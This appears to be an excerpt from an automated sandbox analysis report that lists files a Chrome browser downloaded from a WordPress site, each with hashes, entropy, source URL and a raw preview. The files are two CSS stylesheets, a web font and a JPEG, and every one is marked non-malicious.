                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):97830
                  Entropy (8bit):4.768488979486258
                  Encrypted:false
                  SSDEEP:
                  MD5:6E50D9B85255283022EA8C8233E33307
                  SHA1:597E39F96FBA9CF50BAC4D4C9505B8BFBAAB8873
                  SHA-256:A4DCBB889C1251CFBE068A3358A950C1B4261D642BBC1E4D8F49B2F512E2B06F
                  SHA-512:706376E911EC7435A6506ACA64BD41AA94D27B54A08FC998B7DD3A69E3128645E0FE629FC62C7B15F462472D44A4CF598E556E555F44BCF513061C4367219E8C
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/nucleo-mini.css?ver=1.0
                  Preview:/* --------------------------------..Nucleo Mini Web Font - nucleoapp.com/.License - nucleoapp.com/license/.Created using IcoMoon - icomoon.io..-------------------------------- */.@font-face {. font-family: 'Nucleo Mini';. src: url('../fonts/nucleo-mini.eot');. src: url('../fonts/nucleo-mini.eot') format('embedded-opentype'), url('../fonts/nucleo-mini.woff2') format('woff2'), url('../fonts/nucleo-mini.woff') format('woff'), url('../fonts/nucleo-mini.ttf') format('truetype'), url('../fonts/nucleo-mini.svg') format('svg');. font-weight: normal;. font-style: normal;.}./*------------------------..base class definition.-------------------------*/..nc-icon-mini {. display: inline-block;. font: normal normal normal 14px/1 'Nucleo Mini';. font-size: inherit;. speak: none;. text-transform: none;. /* Better Font Rendering */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./*------------------------. change icon size.-------------------------*/..nc-icon-
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 8348, version 1.0
                  Category:downloaded
                  Size (bytes):8348
                  Entropy (8bit):7.971521660671943
                  Encrypted:false
                  SSDEEP:
                  MD5:91A241AF4D18B191648F2923C30EF804
                  SHA1:5816DD1CAF0759D8BB0D1BCF7E987B3FA3845945
                  SHA-256:62D9677E1CAB571817F6EBA7B4049477A251E1321112E78595CFF375409F32C2
                  SHA-512:18397CCC2B6230856032855E7E63A9E95AD269A52AA2316D426F1F627EEAE813588328B7217838179C0988C1D266A3E46754BED35718D114882A9C510B7E5F2C
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sintony/v15/XoHj2YDqR7-98cVUGYgIr9AJkw.woff2
                  Preview:wOF2...... .......P... A..............................X.`..<.....,.>..4..6.$..b. .....a....=......Pj.LQ....../.....n.&...x..)/#....Oui5j1..&.puB.&.2...b.K.5.g.{p78........^5>..@..nm8...}.;....3fO.J0.%Z...6.P.i#s...U.......?.i....J...t...[>.d..${B..#X....9.A...D.....g..$.M.a..Y.%........y..'.(\L.CaH2Xt..T`...6R.D*#/..O...`.o.w&P......Z..r....8...W7...P..eM.(.c..?.8[..m..\.j*.H^cg.].......y.......h....9Z+ .$).C:k.Z.CT%U....&X..6.P.t.2T..W)..h.....~...B,-c..........qF)G.....g...K.Wa......v..........<...h.q.R<..ZX..% ....Z%....\T..B....h..0..\>4.h.-.......;%..P..6.X{I0:t....r....*..l..`>R..S......4.D4pSy..<...S...[..7...s...x.s......*m..M.6......kc....(Q.V...Li..(.MS...c.4.<]..%.D.p.Lh..N.gL....%.i.^...&@..."..M&.%W~H.".........@...:.n.......6....[..{...q..p.}.q.7...A!..B.EQ.E ..B.!....?.......X,............"`q..:..t....^7X.Eb.O....M.<.. .r............"...+......_..&....L.kb.......P......&..7%.x.Q....... .....@..=..@...#@..`.4.<...H......j..)..........F.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):1016
                  Entropy (8bit):4.418502423861882
                  Encrypted:false
                  SSDEEP:
                  MD5:8BF33E49BEC28B610B825017EBD094B1
                  SHA1:892AD9DB4A6F9C3129E00911536830B2D3EB2104
                  SHA-256:4A792CF04709F20319B0D6E86ABA5F3FF9565560ABB792A28173F9B14EA4D624
                  SHA-512:0C92FA2A99C0C30452FF2AB6F354C544C6857C7C74D45E03E48EF18E572FE68C4D8504CD5015B18585421246835626127CBE712619DA0D778EC6CA76267B6CB1
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/styles3d.css?ver=1.0
                  Preview:@media only screen and (min-width: 1100px){. @media all and (transform-3d), (-webkit-transform-3d) {. .page-index .bg-info .carousel.vertical .carousel-inner > .item {. transition: 0.6s ease-in-out;. }. .page-index .bg-info .carousel.vertical .carousel-inner > .item.next.left, .page-index .bg-info .carousel.vertical .carousel-inner > .item.prev.right, .page-index .bg-info .carousel.vertical .carousel-inner > .item.active {. transform: translate3d(0, 0, 0);. top: 0;. }.. .page-index .bg-info .carousel.vertical .carousel-inner > .item.next, .page-index .bg-info .carousel.vertical .carousel-inner > .item.active.right {. transform: translate3d(0, 100%, 0);. top: 0;. }.. .page-index .bg-info .carousel.vertical .carousel-inner > .item.prev, .page-index .bg-info .carousel.vertical .carousel-inner > .item.active.left {. transform: translate3d(0, -100%, 0);. top: 0;.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 526x530, components 3
                  Category:downloaded
                  Size (bytes):22639
                  Entropy (8bit):7.898653536424275
                  Encrypted:false
                  SSDEEP:
                  MD5:5185E3EF0B3DE62C5BBD1F9FE41987B0
                  SHA1:3886AE012FA28D8356BA244ADAEA344359EAD2B8
                  SHA-256:303E0C9F76F04B625D4A01BC83603D12C80FDE42FE1D72056AF6829095B1C72E
                  SHA-512:83E6DB98EB28AD1C588A32C73CFE43531997BA3EA1FC2E43306C4C9C6C2B83169A4096C1BF5EC299B08ED5729EA7A9C1EE2D1B822660149F3BC85AB05DD0BCE8
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/09/CPA-St-Fabien.jpg
                  Preview:......JFIF..............Photoshop 3.0.8BIM..........g..LohUu4Ofw46U9MZqbRKc..(.bFBMD0a000a87010000780b0000191800008a1a00004a1d000033270000e4360000613a0000873c0000dc3e00006f580000...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."..............................................................................P.............}.....?\.........................|.;.....[.N.y..Z......................<1X.F[....Q.................................Mw.....3.......................<../....1?.i_......<G.!.B@..................Z....C.Ak.....@....>2U..{.i...................<E........&.u=3.....8.l.O'..n&...... .................s7../...&.._?H...r./@..U..i..^...(.....................?5....ta....G..r...6.fRLR....ei....X.g...c.?..s.@.............|C......9..i...st|.y.z......z9..F....M'..L......^........................C.+g...^.....~.>>.&8..n/M...._..U....g...oy}...A..ur..../HD.................Q
                  No static file info